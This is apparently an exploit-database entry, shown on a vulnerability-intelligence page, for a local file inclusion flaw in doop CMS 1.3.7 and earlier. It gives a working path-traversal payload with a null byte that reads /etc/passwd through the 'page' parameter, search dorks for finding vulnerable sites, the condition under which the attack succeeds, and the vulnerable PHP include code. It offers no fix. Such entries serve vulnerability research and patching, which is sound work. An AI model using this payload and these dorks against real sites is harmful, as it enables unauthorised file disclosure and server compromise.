Lucene search
doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability
doop CMS 1.3.7 Local File Inclusion Vulnerabilit
Show more
===========================================================
doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability
===========================================================
______________________________________________________
| DOOP CMS <=1.3.7 Local File Inclusion |
|______________________________________________________|
______________________________________________________
| vuln path: ?page=/../../../../../../../etc/passwd%00 |
| |
| dork: Doop CMS |
| dork2: powered by Doop CMS |
| |
| work only if magic_quotes_gpc are set to OFF |
|______________________________________________________|
______________________________________________________
| vuln code: |
| line 544: |
| if (!isset($_REQUEST['page'])){ |
| $_REQUEST['page']=$homepage; |
| $cpage=$_REQUEST['page']; |
| } else { $cpage=$_REQUEST['page']; } |
| |
| line 646: |
| if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
| if (file_exists("pages/".$cpage.".htm")){ |
| include("pages/".$cpage.".htm"); |
| } |
| else include("pages/".$cpage.".html"); |
| } |
|______________________________________________________|
# 0day.today [2018-01-01] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo15 Oct 2007 00:00Current
7.1High risk
Vulners AI Score7.1